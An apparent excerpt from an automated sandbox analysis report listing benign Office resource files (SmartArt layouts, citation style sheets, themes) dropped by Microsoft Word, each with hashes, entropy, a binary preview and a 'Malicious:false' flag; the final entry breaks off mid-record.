                              SSDEEP:768:+0TU06CkaUYMoi//YX428RaFA8Pi6e9iA4I3w:vICTm/QorUpP7eAA4I3w
                              MD5:205AF51604EF96EF1E8E60212541F742
                              SHA1:D436FE689F8EF51FBA898454CF509DDB049C1545
                              SHA-256:DF3FFF163924D08517B41455F2D06788BA4E49C68337D15ECF329BE48CF7DA2D
                              SHA-512:BCBA80ED0E36F7ABC1AEF19E6FF6EB654B9E91268E79CA8F421CB8ADD6C2B0268AD6C45E6CC06652F59235084ECDA3BA2851A38E6BCD1A0387EB3420C6EC94AC
                              Malicious:false
                              Preview:MSCF....1A......L...........................1A...?..................S@......v...............iso690.xsl.................Content.inf.B.9.....[...A.c...32.E...P..'.^}.f...ikMJ....m..s..U.w{m{{...}n.4........I. ..9..d..I.......P|....F...F.......&&J.:I.34......+*M3..4mr.........m.r..m)....dK.wiw...H,...r........y.$..Cu...L...dH.../..V......g.PG$R39...4O..............{w..^....c.m.m.o.....#..Fgs..6.....b....3.I..O....B..B..1h"....K|f .41......_..g.N.<.>........(....o3a.M)....J..}....-......8.......g.hm!r<...-..1.1....q.?....S.m...`L.g#.K.igv.].ghD....L...p5..?.......iP.[JS.J..?z~.T/.Q...E.K.......P+\LW.-.c..[9.n.7.....P...*[.A1....m...4h.9...N[....h5 n%k.~RR.*c..n..=...4....).eH.-./..>....*.r..S.*..dE.........pF..s.A..?...f..u.+.{..?>N.4].}Xb.M......y......'.2..'..........J4{r..r.3........5>..a0.>.u_.y@g....+y.yu--,ZdD.........5]3..'.s...|.....K.....T..G.G.e...)..\x..OM.g...`..j0......BfH...+.....:......l`.qU...;.@...",.."........>;P.B.^F...3!......Rx.9..
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft Cabinet archive data, many, 4410 bytes, 2 files, at 0x44 "PictureFrame.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                              Category:dropped
                              Size (bytes):20554
                              Entropy (8bit):7.612044504501488
                              Encrypted:false
                              SSDEEP:384:zEAH676iPi8+IS5iqn7G8E0GftpBjExDxIHFLrHRN7Ke/ll7PK/pGaz6:zEhG8+ISrG8Pi6xDxCKoIGaz6
                              MD5:486CBCB223B873132FFAF4B8AD0AD044
                              SHA1:B0EC82CD986C2AB5A51C577644DE32CFE9B12F92
                              SHA-256:B217393FD2F95A11E2C594E736067870212E3C5242A212D6F9539450E8684616
                              SHA-512:69A48BF2B1DB64348C63FC0A50B4807FB9F0175215E306E60252FFFD792B1300128E8E847A81A0E24757B5F999875DA9E662C0F0D178071DB4F9E78239109060
                              Malicious:false
                              Preview:MSCF....:.......D...........................:....?..................................PictureFrame.glox.................Content.inf........[.... '.q..@.........<./..+./. ...."o.o./..{^a.7^.D.HA....^J... ...........T%q..b...+pz.n.=....jT.+M..=H..A...py.3.........H...N...[..%..~....>.%....3.r...wx.....0.....7..94..2..45..7f.......D.. ...[...f.:H..../N..4.....8.....:x.I....u|.`."...\..N..%.M#..^v$.*....T.m.....?.-.wki.X..8..F.G..Y.^8...-....+.&.+&.No...e!.#.8.....YF.......<w.....=.Q.S..7....MW....M..9A.3..c..L....|.E-Y....]n".|....b9..l@.d.T...a.f...~.&k.[..yS..q..]L}..)w.....$.@..v...[9..X....V...a.NK....m9.5.....Kq.;9`.U.e...8.<..)Y.H........z.G...3n.yWa.g.>.w!e.B8:......f..h..z....o.1<.RT..WK...?g .N..+..p.B.|...1pR_......@...a....aA......ye..8...+M.l..(.d..f.;....g........8R.\.w.:ba....%...|p....`lrA.|....a.U.m=ld......7....#..?Dq..D.....(.5.K.a..c.G..7..]hF..%:}......}J.j$.....4...l];..v>.&j........Y.vk..$1.@X$...k...9..?...z..![..../...).a.=....aZ^.3?....
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft Cabinet archive data, many, 6450 bytes, 2 files, at 0x44 "ThemePictureAccent.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                              Category:dropped
                              Size (bytes):22594
                              Entropy (8bit):7.674816892242868
                              Encrypted:false
                              SSDEEP:384:L7d2l8FbHaaIKbtv1gDISi8E0GftpBjEZRFLrHRN74bUll7PK/pd:LUlCIOt/8Pi6Zv4bMId
                              MD5:EE0129C7CC1AC92BBC3D6CB0F653FCAE
                              SHA1:4ABAA858176B349BDAB826A7C5F9F00AC5499580
                              SHA-256:345AA5CA2496F975B7E33C182D5E57377F8B740F23E9A55F4B2B446723947B72
                              SHA-512:CDDABE701C8CBA5BD5D131ABB85F9241212967CE6924E34B9D78D6F43D76A8DE017E28302FF13CE800456AD6D1B5B8FFD8891A66E5BE0C1E74CF19DF9A7AD959
                              Malicious:false
                              Preview:MSCF....2.......D...........................2....?..................0...............ThemePictureAccent.glox.....0...........Content.inf.o.@D..8.[.........B.....?. $...K.....~....aZ.WA"...k.......Z......."......"..X.fpB 2@d..87.[.A......p..e.'......F..P^%.%.RK...........T%0..........9..+8 ...&.q.....+.......^.fad^^n...d.....s1..... .3j.c-c7..y<.....6........C5n.KG...Rs[lt..ZkwI.!..Uj.ez_!A^: /.;.Rl4....^..<6..N...'.YY.n*.E{.`..s.7..z.......L.y.Y.....q.kx.....[5.+<to......1...L.r.m..kC.q.k.1..o.w8s.....xh.@.b.`l\...}z1.6..Y.</DY...Z5..D...0..4.;..XAA..0qD..E.....h...C..hH......S..Z.\.VBu......Rxs.+:RKzD......{......a..=......).<.....d.SM.......c!t.4.h..A=J~.>q?Hw.^.....?.....[..`....v.nl..A.u...S!...............c......b.J.I.....D...._?}..or.g.JZ#*."_``.>.....{...w......s...R.iXR..'z....S.z.\..f.....>7m..0q.c-8\..nZw.q..J.l....+..V....ZTs{.[yh..~..c........9;..D...V.s...#...JX~t8%......cP^...!.t......?..'.(.kT.T.y.I ...:..Y3..[Up.m...%.~
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft Cabinet archive data, many, 17466 bytes, 2 files, at 0x4c "chicago.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 10 datablocks, 0x1203 compression
                              Category:dropped
                              Size (bytes):33610
                              Entropy (8bit):7.8340762758330476
                              Encrypted:false
                              SSDEEP:768:IlFYcxiahedKSDNAPk5WEEfA8Pi6xnOKMRA58:2JitdKsNAM5WBDP7xOKMq58
                              MD5:51804E255C573176039F4D5B55C12AB2
                              SHA1:A4822E5072B858A7CCA7DE948CAA7D2268F1BB4B
                              SHA-256:3C6F66790C543D4E9D8E0E6F476B1ACADF0A5FCDD561B8484D8DDDADFDF8134B
                              SHA-512:2AC8B1E433C9283377B725A03AE72374663FEC81ABBA4C049B80409819BB9613E135FCD640ED433701795BDF4D5822461D76A06859C4084E7BAE216D771BB091
                              Malicious:false
                              Preview:MSCF....:D......L...........................:D...?..................XC.....................chicago.xsl. ...............Content.inf.!..B...[...H."m..3C.6...WP!i/Z..vn._...^omvw+...^..L.4o...g..y......^..x...BH.B.K....w.....F........p ./gg.h.0I',.$..a.`.*...^..vi..mw..........K....oQ............P...#...3.......U(.=...q.~?..H..?.'I4'.......X...}w.vw.....f.n..f{3.....-....%dK&q..D.H.Z..h-..H.[$ %.."..e....1...$.............'.....B..%..4...&`S!DQ...M.......N~............S..'....M..4E.^..dej..i..+.`...6F%sJ....Q..d.(*.s.Z...U-5Eh.s.CK...K..X$......j..T.?.`.|...=..R...-7...*...TU.....7a...&I.noOK|.W.R-+S.d..rR.....{h.Y...)..xJ..=.XM..o...P'.I4m..~I..C..m.....f.....;{Mzg+Wm.~...z...r-.....eK...lj:^.1g5...7.h(T"..t?5......u.....G.Z<..sL.\{...8=t...Z...'tps.:...|....6.....S..X...I...6l.M.....aq.;YS....{:.&.'.&.F.l...\.[L.%.so\.v.Lo...zO.^^...p..*9k...).CC..F0>L...VUE4.......2..c..p.rCi..#...b.C@o.l.. E_b..{d...hX.\_!a#.E.....yS.H...aZ...~D3.pj: ss?.]....~
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft Cabinet archive data, many, 3749 bytes, 2 files, at 0x44 "TabbedArc.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                              Category:dropped
                              Size (bytes):19893
                              Entropy (8bit):7.592090622603185
                              Encrypted:false
                              SSDEEP:384:v3Zh3VlkpSIcgbA8E0GftpBjEmm3UFLrHRN7GYvlvQyUTL2mTAp:v31qp/A8Pi6mUqGGvU+mcp
                              MD5:EF9CB8BDFBC08F03BEF519AD66BA642F
                              SHA1:D98C275E9402462BF52A4D28FAF57DF0D232AF6B
                              SHA-256:93A2F873ACF5BEAD4BC0D1CC17B5E89A928D63619F70A1918B29E5230ABEAD8E
                              SHA-512:4DFBDF389730370FA142DCFB6F7E1AC1C0540B5320FA55F94164C0693DB06C21E6D4A1316F0ABE51E51BCBDAB3FD33AE882D9E3CFDB4385AB4C3AF4C2536B0B3
                              Malicious:false
                              Preview:MSCF............D................................?..................c...............TabbedArc.glox.....c...........Content.inf.;....Y.[.........B.....?.T..ZD...........^C...U.R<Z....z+.I.....Z..-.V...f.....lB..\P.....=.-p....w ...\.kD..x'v..T..A..............".8...d.........FD.ZL.h..T...bp.)9B.v..i..VX...&..\..7.s..qy...l........Rty.Y...rU..>.9...8....L..\.^x.kDU.|TJ..{kN.G..E..$.kvy?.. mv......P..4.....q.1.6<u....e..dD...4.1E..Xi.5.=....1.P.c.K~S...YMO:.?..cL.g.tq\.(b1....E..0A.i..C...BT.m.S......:...}.&U..#QL..O.O../..K......=..........0a..O............BYP......>f.......iu...7.K..;QO~.t....%N.s.]>~#../7YN.....C..9.=cY.......y..U5.....,.....u.....#_..SG.`NR*.....?*..d.R.k.rX$...&.... ..h.4T.D^k-xA...............Hz..ep)e..4..P."fo Ne...o.....0n.Exr.........H..v...A.."..%)2......5...".}j.o8...E.HRQ;}.. .._L.+.jz....{.U..}...=B.o.^..vZ.:5.Z.M....y{\(...N..9...EB*MG...!N.vy..^...nE..2..@.;.4..C..t.4....h..O.8.=.m./...|Lu.|mCU..b.^.n39.h[M...%D{..w.1
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft Cabinet archive data, many, 10800 bytes, 2 files, at 0x44 "ConvergingText.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                              Category:dropped
                              Size (bytes):26944
                              Entropy (8bit):7.7574645319832225
                              Encrypted:false
                              SSDEEP:384:sbUX16g8/atF4NB3TJOvqeMRD/8svIZj/OwgbA8E0GftpBjEYwFLrHRN7mYll7PY:sbhg8yY4nMZK2hA8Pi6Yum4IVR
                              MD5:F913DD84915753042D856CEC4E5DABA5
                              SHA1:FB1E423C8D09388C3F0B6D44364D94D786E8CF53
                              SHA-256:AA03AFB681A76C86C1BD8902EE2BBA31A644841CE6BCB913C8B5032713265578
                              SHA-512:C48850522C809B18208403B3E721ABEB1187F954045CE2F8C48522368171CC8FAF5F30FA44F6762AFDE130EC72284BB2E74097A35FE61F056656A27F9413C6B6
                              Malicious:false
                              Preview:MSCF....0*......D...........................0*...?..................t,..............ConvergingText.glox.....t,..........Content.inf..C..)t-[.....@.........=...xxA. ...E^....x.x.^.......x..^^...DF.......s..d.P.....5.;..]...2.t.w.....O9.G..;.'.T....@I.,.q.u.3..P...9... ....`J.......g.(....).,.h0.....$.3..;.._.....~.de.jj.....U..K.0....`.@.H.1.x.Z.@..q....?....x.wW.....+am8A".....I..)..]...s..-z.2S+|.Cb.t6f],.n.LV......OVg....O.at|..-..x.....:....]s...u..g}.P..v.3....^.".%..%...#.2.....l00...n.......r8.p.....^.....n.)..,..t.^$b...b.q.W...F..R...n.-.+..'........Aw=._OwH....8.:s..{.#..{N.hW..`.._........Wy....>U.?....-.8tg...=..y..@.,.v|......l...t..l#{...H....9..|......~...De..#@y.&K....U...q.c.zK..D.<pV.....Ql..&Y...=#...w....r.`#2....Ug.J(..T...KmW.@...!....j:......M......!..E.7#s.t..F.aU..N....-.i......|w.lr..G.n.,.......=Kl.-m.?F.....v]?.......{q.U.t...<.|..u.....3R.`.t.T.>;v.....KQ...S...7..1...N.kN.y.)v.....3H:..D.{.+.(......u..^W&.
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft Cabinet archive data, many, 4967 bytes, 2 files, at 0x44 "TabList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                              Category:dropped
                              Size (bytes):21111
                              Entropy (8bit):7.6297992466897675
                              Encrypted:false
                              SSDEEP:384:wWZsOvbMZGgbA8E0GftpBjEtnFLrHRN7Dfll7PK/pirk:xZRvuzA8Pi6t9DPISk
                              MD5:D30AD26DBB6DECA4FDD294F48EDAD55D
                              SHA1:CA767A1B6AF72CF170C9E10438F61797E0F2E8CE
                              SHA-256:6B1633DD765A11E7ED26F8F9A4DD45023B3E4ADB903C934DF3917D07A3856BFF
                              SHA-512:7B519F5D82BA0DA3B2EFFAD3029C7CAB63905D534F3CF1F7EA3446C42FA2130665CA7569A105C18289D65FA955C5624009C1D571E8960D2B7C52E0D8B42BE457
                              Malicious:false
                              Preview:MSCF....g.......D...........................g....?..........}.......................TabList.glox.................Content.inf....t....[......@..C...../.U5...........6...`.....T..>3.................=..09`..t......a..Y..BI.Z....=.'0...%...T..........H...>.:A.r......n..p...Pf.h...I.8... ....M.]&.#.vv'.....[c......g....>"......<c..f....i...sb!Z..iu<.%|......q.....G28.h-...7.....W.v...RtdK..F~.0.3.'.e..b7.c......a.3.....a\..]...gp8.+.u/}.w.qF........8.=.=|....\~..S.-q}]0...q.B.H.^J...!...a'.2Tn!..."..%........=.e_-.....{o..%o...a`.w..L.5..r.....e.8...pO..RE.Wgr..b.%.E...O.......8s...E....Um].C..M.....[...H.FZ..4...eZI.$..v.3<]..r....B..............8i......e<.D...Q4.q.^S.....H.b.......r.q..0o.......2..PP,."...JI...xU`.6f..K..Q9.Q..h..t....AI.S6...7............X..`dv..r..S....),7ES....#.....(...\.nh...X.ps%l..F...."<_....q....v........_.e.....P.........|&..fi..4..@..^0..v.]7.......^. ."..}(...w.g.X...=<....p.......L...P..XV....@:....N...Y....
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft Cabinet archive data, many, 5647 bytes, 2 files, at 0x44 "RadialPictureList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                              Category:dropped
                              Size (bytes):21791
                              Entropy (8bit):7.65837691872985
                              Encrypted:false
                              SSDEEP:384:PWew5RNDcvPgbA8E0GftpBjE0hsyaFLrHRN7BD9lI66YR:P3GRNDcEA8Pi60hsyABDo66g
                              MD5:7BF88B3CA20EB71ED453A3361908E010
                              SHA1:F75F86557051160507397F653D7768836E3B5655
                              SHA-256:E555A610A61DB4F45A29A7FB196A9726C25772594252AD534453E69F05345283
                              SHA-512:2C3DFB0F8913D1D8FF95A55E1A1FD58CE1F9D034268CD7BC0D2BF2DCEFEA8EF05DD62B9AFDE1F983CACADD0529538381632ADFE7195EAC19CE4143414C44DBE3
                              Malicious:false
                              Preview:MSCF............D................................?..................................RadialPictureList.glox.................Content.inf....8....[.... $nq......C...../U..........a......S.Q...Q....j............(..z,.g.........^...Y..D... #i.TH5.<.=N..$..7.p".7.............`.3..1~,=,(.d8.Z.1....4'G.....!W^gClf._j.-N..&k.....Y3` =.(S..B^...i.zB.U....0O..h...I.(.......L...5.X.8.Sc<=>w.=.?&.....mR.......x.......mpW.T..^.FU...SN.C)......vsa.,x......,....E..i>..[g...#t...M..GR.9..$/4.:..q.bc9..x{bC.0..K.)..t.Y.&.v.d.16.B..c..or..W.,.B.........O.0..k.v........*F+..U.w...d...o8......A).}...#......L.!?.U.r.^.$...e.(..PG)8..+.9.5.l}.)..b.7+. 4....-.lC...|..j..Q.,.....7.W...|;j...%...:...|H..........<..%...K.....Fy.q$.k..}..8.9.M.u.?$].......r.....e.|..._..iT.;Dq5[....f.s..P.......e.T....!Y{.....t.wm..A..w-..7...3..T.:8.4.a[.Oo.. V.l.@.}..........E.&..J.....+..+.9)9<.._R.Hb.....V..Qu....:v.t.Li.0..J..V..b...!..N....-mD..c..(.[&o>.M.b..H.q..lk../..........W.8..z..B...
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft Cabinet archive data, many, 6196 bytes, 2 files, at 0x44 "ThemePictureGrid.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                              Category:dropped
                              Size (bytes):22340
                              Entropy (8bit):7.668619892503165
                              Encrypted:false
                              SSDEEP:384:GByvLdFHny7G8E0GftpBjE8upFLrHRN778lvQyUTL2mm2y:Oy3HkG8Pi6887mvU+ma
                              MD5:8B29FAB506FD65C21C9CD6FE6BBBC146
                              SHA1:CE1B8A57BB3C682F6A0AFC32955DAFD360720FDF
                              SHA-256:773AC516C9B9B28058128EC9BE099F817F3F90211AC70DC68077599929683D6F
                              SHA-512:AFA82CCBC0AEF9FAE4E728E4212E9C6EB2396D7330CCBE57F8979377D336B4DACF4F3BF835D04ABCEBCDB824B9A9147B4A7B5F12B8ADDADF42AB2C34A7450ADE
                              Malicious:false
                              Preview:MSCF....4.......D...........................4....?..................1...............ThemePictureGrid.glox.....1...........Content.inf....K..5.[.... V.q......B.....?.h.i.J.D...Z...>.....i~...A...Z....H.hy.D..X.....>...L.I..`. z w0}.K`.C{h....W\../.U..p\%...B...;............9..8.^M.....].lP.p...|..?..M....E..S.`..-n........Q'.'.o..C}=..?`.bQ...J"0f.. ....k3n..F.Pu..#...w].`<...."D.].-.#+):..fe..=<.M...4..s.q.f._.=.*T.M..U.[R.kbw.,......t6_I...~.X..$_.q....}2..BR...).[...<.l.3........h%....2.$`>..hG...0.6.S......._3.d~1.c.2g....7tTO..F.D.f.Y..WCG.B..T....Gg&.U'....u.S/......&6w..[bc.4....R.e..f.,....l."........I....J.=~...$x.&2...+,-.;.v.'.AQ.fc...v._..rZ..TYR...g?..Z..!.3mP dj...../...+...q.....>..../...]P.z?DW&.p..GZ....R5n......,..]{].0m.9...o.{...e."...8VH....w"%;.g\.K..p.}....#r.u..l.vS...Y.7U.N*-E@.....~....E...x.....C.......{NP....5Ymk.*._.K...Z...f..;.......b.....,._@B..\.S..d.'\rs..].}.5"XJU.J..'.zk}.+P.)C.X.?9sx.D....(K....P^N_D...Z.........
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft Cabinet archive data, many, 5213 bytes, 2 files, at 0x44 "rings.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                              Category:dropped
                              Size (bytes):21357
                              Entropy (8bit):7.641082043198371
                              Encrypted:false
                              SSDEEP:384:zdx+NRrogu6fzCI7Th7G8E0GftpBjEzZq4FLrHRN7/Oll7PK/pB:/+NRrFf/G8Pi6zZb/GIB
                              MD5:97F5B7B7E9E1281999468A5C42CB12E7
                              SHA1:99481B2FA609D1D80A9016ADAA3D37E7707A2ED1
                              SHA-256:1CF5C2D0F6188FFFF117932C424CC55D1459E0852564C09D7779263ABD116118
                              SHA-512:ACE9718D724B51FE04B900CE1D2075C0C05C80243EA68D4731A63138F3A1287776E80BD67ECB14C323C69AA1796E9D8774A3611FE835BA3CA891270DE1E7FD1F
                              Malicious:false
                              Preview:MSCF....].......D...........................]....?..........{.......................rings.glox.................Content.inf..|^.....[......P........<.$.."..0R..xa.Ax#B..d... ....K,.....^.H.....H.........&.j.\f.. ..,....,..!k..R..e..!...E...........................><.RB.....~h...........Q................g..M|,...x.....qV7.u..\...F-N.{-..X..&Zig.~..{.A.p.Z...X..{,-n............`$.%.ND.....>].6cvZ.%d..*a.$..-.K.Hf....L..;.#...H....U,........P.@.*-$C.,.g...%YJE..$.jP........b...Y<..[U...MF]F.K...1... x.}3w.o.#,.}T.....w5+...=.=...c.F^....OM.=.......G_{n.*...WC.w!......{/.~.}..s..6_......)..Xy...4.....<..XZJ........#~._i....%..fM.V.?.q...q.....7...B..sVt...(.:..c....~.e...kGZ...C..(J..o...`...?.)-.T.l....&...gR.$.....g.:...2.e%F.....x....z0...K..a8B...........D..]....7....~.".DR...r)...}b)e.>.\h~f...(}.c........Q...o5H.........C.KC.(.L.l................R..a.pg{..\.......-b........}.C......qTS..%..r.lG..Q.1..Z.>a.D...tC..LV...Rs.C.M18x.:......%O.
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft Cabinet archive data, many, 26644 bytes, 2 files, at 0x4c "Element design set.dotx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 2 datablocks, 0x1203 compression
                              Category:dropped
                              Size (bytes):42788
                              Entropy (8bit):7.89307894056
                              Encrypted:false
                              SSDEEP:768:Hx+UzBiwDQTXgBm029ClGn4BZz6i5kIew/jG8Pi6lYJz1gH:0ZXc29eGn2n5klwjxP7l2z1gH
                              MD5:21A4B7B71631C2CCDA5FBBA63751F0D2
                              SHA1:DE65DC641D188062EF9385CC573B070AAA8BDD28
                              SHA-256:AE0C5A2C8377DBA613C576B1FF73F01AE8EF4A3A4A10B078B5752FB712B3776C
                              SHA-512:075A9E95C6EC7E358EA8942CF55EFB72AC797DEE1F1FFCD27AD60472ED38A76048D356638EF6EAC22106F94AFEE9D543B502D5E80B964471FA7419D288867D5D
                              Malicious:false
                              Preview:MSCF.....h......L............................h...?..................@g......o...............Element design set.dotx.................Content.inf.Y/..Re..[......f........,..]....D.],....]..X.......XC4pE.....p........2..u;L.N.....]G..d.^d.$).e.=..;..Kb.../.../....H.."...w$._I..5.....a..4.Gd5p......v.8..1..%H..\..e...3.e..A..).d*.. . (.8.".......(>..<...@...~*v&.f..LWhqk]+Uep.d..%...o.....k.......e...nNN.&_.>.d.?H`"...r?..Z.p..q..<M.N.t....{*.y]#...._XW"qI...x.......}.. .N...;.}:..m8...[.r.F....^?...o...u..*...J3.V....~...~tn#.Kf6.s.|*..,s...M.$.f..?Yu.pE.1_wU...%....._..'..Z......y:.{.J5..7..Q.w}/.~.-3~Ctw=..IT.....mI.u@...y.M....2.%...y...Y..j.k<-.Q.r...7m..b...+.6..|.....U..}[...,....^....5..D..qW...[3).p.Y<.Hh..t...%cw=Z..W.~W.F....zr.4.g...O...P.g_^..3.-............3s...S..y...u...N...EsJz....tT../..c[w{cG....../6.....:.W<d5}.q..s..K"$........Ne..5..#.v'..n4.rj....Fc=....5..VN.....6..9`....|..........WX..-?..........W.)^`1.......].R2..s6...H.......
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft Cabinet archive data, many, 19375 bytes, 2 files, at 0x4c "turabian.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 11 datablocks, 0x1203 compression
                              Category:dropped
                              Size (bytes):35519
                              Entropy (8bit):7.846686335981972
                              Encrypted:false
                              SSDEEP:768:2LFougzHaUdBKUsM+Z56zBjA8Pi6bo+ld8IX:MFodzHaULR9P7bo+l6IX
                              MD5:53EE9DA49D0B84357038ECF376838D2E
                              SHA1:AB03F46783B2227F312187DD84DC0C517510DE20
                              SHA-256:9E46B8BA0BAD6E534AF33015C86396C33C5088D3AE5389217A5E90BA68252374
                              SHA-512:751300C76ECE4901801B1F9F51EACA7A758D5D4E6507E227558AAAAF8E547C3D59FA56153FEA96B6B2D7EB08C7AF2E4D5568ACE7E798D1A86CEDE363EFBECF7C
                              Malicious:false
                              Preview:MSCF.....K......L............................K...?...................J.......@..............turabian.xsl."...............Content.inf._.......[...T.....C4.5...E0B.]...+.-f....rc.[52.$...a..I....{z...`hx.r...!.. $...l..\....#3EF..r..c;<p...&n.\b..K..0Y..c+.2...i..B..wwY..77,...........}.q.C.......n..,.....prrx.QHy.B#..,.'....3....%1.``..hf...~...[.[n.v.s..y.vw....;..s.G293G&H....$E......m.&^..iy/.4.C...D...".(H&..&.I4._...!...... ........q.k1.d.....qc.3.c.....;.5.......y}...}&...+.WAN.,zVY.Q....V.Tz........g..H..c...E2jY...4g?.yf<....V.M.s.$..k.Id....+..?..._.\.s.k..9..I%;.yWQ..S..]..*.n<.7........=......"Q.*E.....MG..j.Yt..!U....Q.j...v.h-.~b..e&.......;...\.....:.....=..Xv1&q........6\...xw.%*.VdS..H...o...s.....+..%[../>.t..I....F.....".G|.....=....[..S..3..a.C.ZZ...tK.6N..b........)>........I..m..QE.M.nv.MVl.....vCG>,.suP.gqo.rr....J`m....J.b..},[F*....e.A.]..r....C4.?JJs6..l.].9...Q.B.~.......\d%.X ...8A....rH....&?#...^.....4.h.{>
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft Cabinet archive data, many, 3144 bytes, 2 files, at 0x44 "VaryingWidthList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                              Category:dropped
                              Size (bytes):19288
                              Entropy (8bit):7.570850633867256
                              Encrypted:false
                              SSDEEP:384:5ZII4Hf+7G8E0GftpBjCwBFLrHRN7bcClvQyUTL2mH:pG8PicgbcAvU+mH
                              MD5:B9A6FF715719EE9DE16421AB983CA745
                              SHA1:6B3F68B224020CD4BF142D7EDAAEC6B471870358
                              SHA-256:E3BE3F1E341C0FA5E9CB79E2739CF0565C6EA6C189EA3E53ACF04320459A7070
                              SHA-512:062A765AC4602DB64D0504B79BE7380C14C143091A09F98A5E03E18747B2166BD862CE7EF55403D27B54CEB397D95BFAE3195C15D5516786FEBDAC6CD5FBF9CD
                              Malicious:false
                              Preview:MSCF....H.......D...........................H....?..................................VaryingWidthList.glox.................Content.inf...O.....[.... v.q......R.....>.%i.I.HhD.V...qt.....'....N...!..aw$(J.%(..A..h......l|.D.p9`..Y09.:.u....p. :,.*.YD=0.p. ......w.........*..<..;.....u.."......7[....8.....?^........-..;q.|.....B....PJ....r.K#.#.0'...}.........+gpR...T....5.iu.^I...A\..gK....}..z.B.nT.../.m.......N....E'1.E.\..o.....W..R.#.#...8.7...R.SbW-...%......$.obj.F..W_@....sY!........s.O..."k. ..b....j....v...P.\....7d...|"J.T...2p..m.&..r..,2.).....X.`...xt].U...b.h..V.....|L..N.Z.O#....o...1R.w30.g..?;..C.T.:$..MGY.C"i\.f..#..<.k...m..s.w. ..Ga].....wt.h|.Ta<.......(SO.]9.%a..Z... r._JH.=O...P.9a.v.....Kj.".T...m...4.?...F...$...y.....hbW.UA..u.&)....py.C{.=t.....n...}|H3A9.=..W..JJ..y./Y.E.M9..Z..w. .HB.YoIi..i.e..9;n...SpHw,....f....d>..g.m..z...... ...f...KP.M..U.....~vFD.fQ.P?......2!.n.....`@C!G...XI.].s,.X.'...u.E.o..f
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft Cabinet archive data, many, 279287 bytes, 2 files, at 0x44 +A "Basis.thmx" +A "content.inf", flags 0x4, ID 55632, number 1, extra bytes 20 in head, 18 datablocks, 0x1503 compression
                              Category:dropped
                              Size (bytes):295527
                              Entropy (8bit):7.786811461499414
                              Encrypted:false
                              SSDEEP:6144:nwVaEqsf23c9shf6UyOGgDWDn/p3fd+zkPWnvGL3n9bQnkmVheyqt:MlPfW6sVEDn/pPdhWnvGL36zyyq
                              MD5:6CE7C136CA976F01314C83215558C821
                              SHA1:307307A353E2DE8881466379B884042AD97D82AB
                              SHA-256:7A9B8E681C120AA0A854B3FB3FA35B67D20C308CC593476313C8F7426F9F4FB8
                              SHA-512:3EBFB310C3A70A3FE249A507FE4141DF6D19A5B3A4DE9E478F0A55B31901AA2776BBA0C03549306ED4C7996BE32A56DEC674364BAC9B9244174715E2EC4E7495
                              Malicious:false
                              Preview:MSCF.....B......D...............P............B..p?..........{.................M.. .Basis.thmx...........M.. .content.inf.`g..td..[...............5..$..WM.....R.......H\.+\./^...x.^..h..MU..\........v........+......g...$.......g.....~....U].7..T..1k.H...1...c.P.rp.6K..&......,.............U4.WoG.w.....;.....v..922.;]..5_-]..%E]b..5]... (..H..II..ttA4Q..BI!|...H.7J.2D....R.......CXhi`n....6..G.~&.[..N...v..Z"t.a..K..3..).w...._@.}.}.v.......4......h....R;.8.c&.F...B^....Q.....!Bm2...F.`.......M;...#.{....c...?...e...6t..C.-.E.V.v%I..H.....m.n...$D.....vU'.....=6}~...Gw...Y..?.@......G.....k......z...5d.h......1.}..O*;e..t......Y.0...3.v).X.-.2.....~....14.[.w=I....hN....eD..7G.u.z..7.do..!....d..o.wQ.:....@/.^..<e.-..=\.....6.C.'.rW$..Cp.M3.u6z......Q.F.9.5....juc..I...m4]7L....+n......).t......2[.3.p.:.....O5y..wA........^..!..H....{..S.3w.!&.'.;...(..|m.x.S..Z.j..3...n..WU...../w.......xe=.+.D...x..qy.S.....E..... ...uu.`.,..<.6[p
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft Cabinet archive data, many, 291188 bytes, 2 files, at 0x44 +A "Banded.thmx" +A "content.inf", flags 0x4, ID 56338, number 1, extra bytes 20 in head, 18 datablocks, 0x1503 compression
                              Category:dropped
                              Size (bytes):307348
                              Entropy (8bit):7.996451393909308
                              Encrypted:true
